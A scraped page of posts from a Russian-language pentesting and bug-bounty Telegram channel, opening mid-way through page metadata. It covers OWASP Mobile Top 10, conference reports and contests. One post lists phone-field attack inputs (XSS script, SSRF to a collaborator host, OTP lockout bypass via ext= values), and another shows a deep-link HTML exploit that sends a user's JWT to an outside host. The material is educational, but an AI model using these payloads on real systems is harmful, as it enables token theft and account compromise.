en
Feedback
Что-то на пентестерском

Что-то на пентестерском

Open in Telegram

Веб, мобилки, баг баунти, пиво Йа - @fir3wall1 Чат - https://t.me/+-2ADwiR095I5YzQy

Show more
2 522
Subscribers
No data24 hours
+27 days
+830 days
Posts Archive
\n// Следует поставить в query string параметр в который помещен номер\n\n ✅ SSRF \n+88005553535;phone-context=burpcollab\n// Работает редко, в основном на старых системах\n\n ✅ OTP Обход блокировки \n+88005553535;ext=0 \n+88005553535;ext=2 \n+88005553535;ext=3\n// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили \n\n📌 Более подробно изучить можно тут:\n— HackTricks\n\nЧТНП | #web","datePublished":"2023-09-04T01:53:28Z","dateModified":"2023-09-04T01:53:28Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":707},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":19},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":45}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/102","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/102","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/102","headline":"⛈ Android Insecure logging в виде инфографики","articleBody":"⛈ Android Insecure logging в виде инфографики","datePublished":"2023-08-28T00:39:09Z","dateModified":"2023-08-28T00:39:09Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":463},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/98","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/98","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/98","headline":"⛈ Android Insecure logging в виде инфографики Решил попробовать в инфографику, дай знать если понравилось или…","articleBody":"⛈ Android Insecure logging в виде инфографики\nРешил попробовать в инфографику, дай знать если понравилось или что-то поменять надо 🍴","datePublished":"2023-08-28T00:08:16Z","dateModified":"2023-08-28T00:38:57Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":34},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/94","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/94","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/94","headline":"⛈Поход на OFFZONE Поход на OFFZONE получился приятным и хорошим. Организаторы смогли передать атмосферу а-ля…","articleBody":"⛈Поход на OFFZONE \n\nПоход на OFFZONE получился приятным и хорошим. \nОрганизаторы смогли передать атмосферу а-ля хакерской тусовки, а стенды компаний придумали веселые квесты и неожиданные плюшки для комьюнити багхантеров/пентестеров.\n\n🟢Тинькофф задарил мерчем за багу о которой я писал, подарили: термос показывающий температуру, стикеры, кнопки для одежды на магните, пряник с надписью Багханчу за еду 😁\n🟢Offzone при входе уже дарил мерч - пластмассовая красивая бутылка, еще и оригинальный бейдж в виде платы на которую можно еще и цеплять крутые аддоны от различных стендов\nК тому же был еще и бесплатный кальян, а Positive Tech угощали фирменным пивом и всё это на крыше, откуда открывается красивый вид на тусовку снизу под музыку жанра техно 👍\n🟢Удалось вживую встретится со многими крутыми ребятами и даже с теми, кого давно знаешь но ни разу не видел вживую. Спикеры и доклады были на высоте, много полезного для себя подчеркнул\nИ это еще не всё..\n \n📌 Сама атмосфера даёт мотивации двигаться и развиваться дальше, также позволяет просто поговорить душевно с разными людьми, обмениваться опытом. Всё таки комьюнити у нас суперское\nТем, кто не был - советую прийти в следующем году 👍\nHappy hacking 🤝\n\nЧТНП | #блабла","datePublished":"2023-08-25T21:10:43Z","dateModified":"2023-08-25T21:10:43Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":5,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":676},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":5}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/93","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/93","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/93","headline":"⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров Данное руководство позволит…","articleBody":"⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров\n\nДанное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах\nПошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉\n\n📶 Bug Bounty Blueprint\n\nЧТНП | #web","datePublished":"2023-08-22T10:11:52Z","dateModified":"2023-08-22T10:11:52Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1394},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":111}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/92","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/92","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/92","headline":"Иии победителем в розыгрыше OFFZONE становится @Rusikergo Поздравим победителя 🎉🎉","articleBody":"Иии победителем в розыгрыше OFFZONE становится @Rusikergo\nПоздравим победителя 🎉🎉","datePublished":"2023-08-14T21:07:41Z","dateModified":"2023-08-14T21:07:41Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":575},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/91","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/91","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/91","headline":"И так, все готовы?)","articleBody":"И так, все готовы?)","datePublished":"2023-08-14T21:00:45Z","dateModified":"2023-08-14T21:00:45Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":4,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":549},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":4}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/90","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/90","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/90","headline":"⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим дру…","articleBody":"⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим другом из канала Дневник безопасника решили увеличить ваши шансы на выигрыш.\n\nВсё просто. От вас требуется:\n⬜️ Оставить любой комментарий под этим постом и под этим\n⬜️ Быть подписанным на Дневник Безопасника и этот канал\n\n📌 До конца розыгрыша осталось: 6 часов 🔥\nРовно в 00:00 по МСК времени 15 числа опубликуем победителя 😎","datePublished":"2023-08-14T15:01:20Z","dateModified":"2023-08-14T15:01:20Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":4,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":574},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":4}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1952594666-pntests/posts/89","url":"https://telemetr.io/en/channels/1952594666-pntests/posts/89","mainEntityOfPage":"https://telemetr.io/en/channels/1952594666-pntests/posts/89","headline":"⚔️ Заряжайся адреналином и присоединяйся к команде атакующих! Участвуй во Всероссийской студенческой кибербит…","articleBody":"⚔️ Заряжайся адреналином и присоединяйся к команде атакующих! \n\nУчаствуй во Всероссийской студенческой кибербитве и сражайся за приз в 100 000 рублей! 😎\n\nInnostage ищет ребят, которые будут взламывать объекты инфраструктуры коммерческих предприятий и государственных структур на базе учебного виртуального киберполигона Innostage.\n\nПрисоединяйся, если ты:\n✔️ студент российского вуза\n✔️ имеешь опыт CTF-соревнований\n✔️ можешь собрать свою команду или уже в ней состоишь\n✔️ хочешь проверить свои силы в условиях, максимально приближенных к реальности\n\nТебе предстоит сразиться со студентами, которые прошли подготовку в условиях настоящего SOC!\n\nГотов принять их вызов? Тогда переходи по ссылке и регистрируйся. Прием заявок до 19 августа.","datePublished":"2023-08-13T02:39:44Z","dateModified":"2023-08-13T02:39:44Z","author":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"publisher":{"@type":"Organization","name":"Что-то на пентестерском","url":"https://telemetr.io/en/channels/1952594666-pntests","image":"https://img.tlmtr.io/c/288T4m/5262832129295894454?ty=x"},"commentCount":1,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":748},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":1}]}}]}
#podcast #НеДляГалочки Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером😄 ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера. 💡Apple, Яндекс 🎤Ведущие выпуска: 🔵Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead 🔵Елизавета Дмитриева, data privacy engineer в российском инхаусе 🆕Помогали справиться с кошмаром: 🔵Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix. 🔵Елизавета Никулина — директор по маркетингу и PR в Awillix Обсудили: ⬇️Векторы атак ⬇️Жизненный цикл утечек данных ⬇️Последствия утечек для человека ⬇️Реагирование на инциденты, а том числе PR-позиция компании ⬇️Немного коснулись базовой инфобезной терминологии

⛈ OWASP Mobile Top Ten 2023 Наконец-то, спустя 7 лет вышел топ 10 по мобилкам Вот как это теперь выглядит вкратце: 🟢M1: Impr
OWASP Mobile Top Ten 2023 Наконец-то, спустя 7 лет вышел топ 10 по мобилкам Вот как это теперь выглядит вкратце: 🟢M1: Improper Credential Usage 🟢M2: Inadequate Supply Chain Security 🟢M3: Insecure Authentication/Authorization 🟢M4: Insufficient Input/Output Validation 🟢M5: Insecure Communication 🟢M6: Inadequate Privacy Controls 🟢M7: Insufficient Binary Protections 🟢M8: Security Misconfiguration 🟢M9: Insecure Data Storage 🟢M10: Insufficient Cryptography Happy hacking ☺️ 📌 Полезные ссылки по апдейту: 📶 Мысли основателя канала Android Guard 📶 OWASP 2023 ЧТНП | #mobile

Content-Security-Policy: способ борьбы с уязвимостями межсайтового скриптинга 🔒 Настройка, использование и способы обхода защиты 🐈 https://telegra.ph/Content-Security-Policy-10-31

Победа 😎 Буду вещать вам с хакса ❤️

Repost from Standoff 365
🤩 Конкурс инвайтов на Standoff Hacks за лучшие материалы о прикладной безопасности завершен! Талантливые авторы присоединятс
🤩 Конкурс инвайтов на Standoff Hacks за лучшие материалы о прикладной безопасности завершен! Талантливые авторы присоединятся к нашему priv8-ивенту, который пройдет 26 ноября в рамках Moscow Hacking Week. Пять инвайтов мы разыграли за самые крутые статьи. Вот ники победителей и их темы: 1. whoamins. «Обычный Client Side с необычной эксплуатацией» 2. qwqoro. «E-mail Injection» 3. iSavAnna. «Не все "ошибки" одинаково полезны — с точки зрения безопасности» 4. Ivan. «Как не стоит обрезать изображения. aCropalypse (CVE-2023-21036)» 5. Firewall. «Как ломать сайты на 1С-Битрикс» Один бонусный, шестой, инвайт — за видео «Гайд по рекону в багбаунти для новичков», его получает lifei8hitt. А еще свою статью «Анализ прошивки» прислал superhacker123 — она вышла достойной, но ее автор получил инвайт еще до конкурса 😉 Все работы скоро будут опубликованы на Хабре (следить за обновлениями можно здесь) — они помогут специалистам по кибербезопасности стать еще сильнее (и, возможно, принять участие в следующем Hacks). С заслуженной победой! 👏

sticker.webp0.26 KB

⛈ Android & iOS Deep link vuln Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем
Android & iOS Deep link vuln Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости 🟢Deep Link По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение У каждого приложения свой дип линк и выглядит примерно так: ➡️ название_приложения://параметр ➡️ keklol://open_document=name 🟢Ищем уязвимости Уязвимости возникают за счет неправильной обработки параметров из дип линков Уязвимости могут быть разные в зависимости от того, что за параметр перед вами ➡️ Кейс: Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator ⬜️ Сначала ищем параметры дип линка, найти их можно при реверсе самого приложения, либо через утилиту strings ⬜️ Обнаружился параметр URL, который принимал сторонние ссылки ⬜️ Поскольку дип линк это ссылка, значит нужно создать эксплойт в виде простой html страницы с внедрением данного дип линка и его параметра <a href="keklol://url=http://burp_collab">click</a> ⬜️ После открытия ссылки, на burp collaborator приходит jwt token, раскодировав токен, в нем обнаруживается конфиденциальная информация о пользователе 🟢Заключение В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий Если можно заставить пользователя подписаться на какие-то каналы - низкий Happy hacking ☺️ 📌 В качестве дополнительных примеров делюсь полезными ссылками: 📶 RCE через deep link 📶 CSRF в приложении перископ ЧТНП | #mobile

Repost from Похек
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare Исследователи из компании Certitude обнаружили, что брандмауэр
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare. #xakep #cloudflare 💬 Канал | 📡 Хакер | ➡️Более подробная информация

⛈ IDOR - как предсказать идентификатор Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал чт
IDOR - как предсказать идентификатор Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR Happy hacking 😉 📶 IDOR - how to predict an identifier ЧТНП | #web

IDOR - как предсказать идентификатор Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывают как баг хантеры смогли предсказать ID и получить IDOR Happy hacking 😉 📶 IDOR - how to predict an identifier ЧТНП | #web

⛈ Атаки на механизм ввода номера телефона Привет! Давай разберемся как найти уязвимости в форме ввода телефона. Согласно RFC
Атаки на механизм ввода номера телефона Привет! Давай разберемся как найти уязвимости в форме ввода телефона. Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров. 🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр. 🟩Атаки используя параметры: ✅ XSS +88005553535;phone-context=<script>alert(1)</script> // Следует поставить в query string параметр в который помещен номер ✅ SSRF +88005553535;phone-context=burpcollab // Работает редко, в основном на старых системах ✅ OTP Обход блокировки +88005553535;ext=0 +88005553535;ext=2 +88005553535;ext=3 // Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили 📌 Более подробно изучить можно тут: — HackTricks ЧТНП | #web

⛈ Android Insecure logging в виде инфографики
+3
Android Insecure logging в виде инфографики

⛈ Android Insecure logging в виде инфографики Решил попробовать в инфографику, дай знать если понравилось или что-то поменять
+3
Android Insecure logging в виде инфографики Решил попробовать в инфографику, дай знать если понравилось или что-то поменять надо 🍴

⛈Поход на OFFZONE Поход на OFFZONE получился приятным и хорошим. Организаторы смогли передать атмосферу а-ля хакерской тусовк
+3
Поход на OFFZONE Поход на OFFZONE получился приятным и хорошим. Организаторы смогли передать атмосферу а-ля хакерской тусовки, а стенды компаний придумали веселые квесты и неожиданные плюшки для комьюнити багхантеров/пентестеров. 🟢Тинькофф задарил мерчем за багу о которой я писал, подарили: термос показывающий температуру, стикеры, кнопки для одежды на магните, пряник с надписью Багханчу за еду 😁 🟢Offzone при входе уже дарил мерч - пластмассовая красивая бутылка, еще и оригинальный бейдж в виде платы на которую можно еще и цеплять крутые аддоны от различных стендов К тому же был еще и бесплатный кальян, а Positive Tech угощали фирменным пивом и всё это на крыше, откуда открывается красивый вид на тусовку снизу под музыку жанра техно 👍 🟢Удалось вживую встретится со многими крутыми ребятами и даже с теми, кого давно знаешь но ни разу не видел вживую. Спикеры и доклады были на высоте, много полезного для себя подчеркнул И это еще не всё.. 📌 Сама атмосфера даёт мотивации двигаться и развиваться дальше, также позволяет просто поговорить душевно с разными людьми, обмениваться опытом. Всё таки комьюнити у нас суперское Тем, кто не был - советую прийти в следующем году 👍 Happy hacking 🤝 ЧТНП | #блабла

⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров Данное руководство позволит тебе начать сво
Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров Данное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах Пошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉 📶 Bug Bounty Blueprint ЧТНП | #web

Иии победителем в розыгрыше OFFZONE становится @Rusikergo Поздравим победителя 🎉🎉

И так, все готовы?)

⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим другом из канала Дн
⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим другом из канала Дневник безопасника решили увеличить ваши шансы на выигрыш. Всё просто. От вас требуется: ⬜️ Оставить любой комментарий под этим постом и под этим ⬜️ Быть подписанным на Дневник Безопасника и этот канал 📌 До конца розыгрыша осталось: 6 часов 🔥 Ровно в 00:00 по МСК времени 15 числа опубликуем победителя 😎

⚔️ Заряжайся адреналином и присоединяйся к команде атакующих! Участвуй во Всероссийской студенческой кибербитве и сражайся за
⚔️ Заряжайся адреналином и присоединяйся к команде атакующих! Участвуй во Всероссийской студенческой кибербитве и сражайся за приз в 100 000 рублей! 😎 Innostage ищет ребят, которые будут взламывать объекты инфраструктуры коммерческих предприятий и государственных структур на базе учебного виртуального киберполигона Innostage. Присоединяйся, если ты: ✔️ студент российского вуза ✔️ имеешь опыт CTF-соревнований ✔️ можешь собрать свою команду или уже в ней состоишь ✔️ хочешь проверить свои силы в условиях, максимально приближенных к реальности Тебе предстоит сразиться со студентами, которые прошли подготовку в условиях настоящего SOC! Готов принять их вызов? Тогда переходи по ссылке и регистрируйся. Прием заявок до 19 августа.